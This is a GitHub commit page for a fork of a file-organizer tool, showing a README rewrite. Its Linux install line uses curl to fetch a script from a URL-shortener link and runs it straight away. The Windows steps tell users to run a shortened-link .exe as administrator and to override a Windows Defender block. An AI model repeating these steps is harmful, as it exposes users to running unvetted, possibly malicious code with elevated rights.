forked from mishrabiswajit/THE-ORGANIZER
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
24d63d9
commit c228bc0
Showing
3 changed files
with
696 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,47 @@ | ||
# THE-ORGANIZER | ||
This is a simple yet useful program for PC users who hate clutter and want to keep their files organized | ||
# <b>THE ORGANIZER</b> | ||
|
||
This project helps you organize files based on their extensions and remove clutter from your directory. | ||
|
||
## Table of Contents | ||
|
||
- [Overview](#overview) | ||
- [Prerequisites](#prerequisites) | ||
- [Installation](#installation) | ||
- [Usage](#usage) | ||
- [License](#license) | ||
<br><br> | ||
|
||
## Overview | ||
|
||
Managing a directory with multiple files can become challenging and cluttered over time. This project provides a simple solution to organize files based on their extensions, making it easier to find and manage your files. | ||
<br><br> | ||
|
||
## Prerequisites | ||
|
||
[You should have python installed on your system.](https://www.toolsqa.com/python/install-python/) (Not necessary for windows users) | ||
<br><br> | ||
|
||
## Installation | ||
|
||
<b>Linux users</b> : | ||
|
||
```shell | ||
curl -o THE_ORGANIZER.py https://maglit.me/ && python THE_ORGANIZER.py | ||
``` | ||
|
||
<b>Windows users</b> : | ||
|
||
1. Download the [.exe](https://maglit.me/nontot) file. | ||
2. Right click on the program and run as administrator OR double click on the program and click on run anyway.(if blocked by windows defender) | ||
<br><br> | ||
|
||
## Usage | ||
|
||
  <b>[Linux System](https://drive.google.com/file/d/1Q7Ag84hGMLrKKwd1-ODiYEYagnh4U6iy/view?usp=sharing) | ||
|
||
  [Windows System](https://drive.google.com/file/d/1_EJfYQmY283DQfZrDUTPIGAnsP6svy0D/view?usp=drive_link)</b> | ||
<br><br> | ||
|
||
## License | ||
|
||
This project is licensed under the [Apache License 2.0](LICENSE). |
Binary file not shown.
Oops, something went wrong.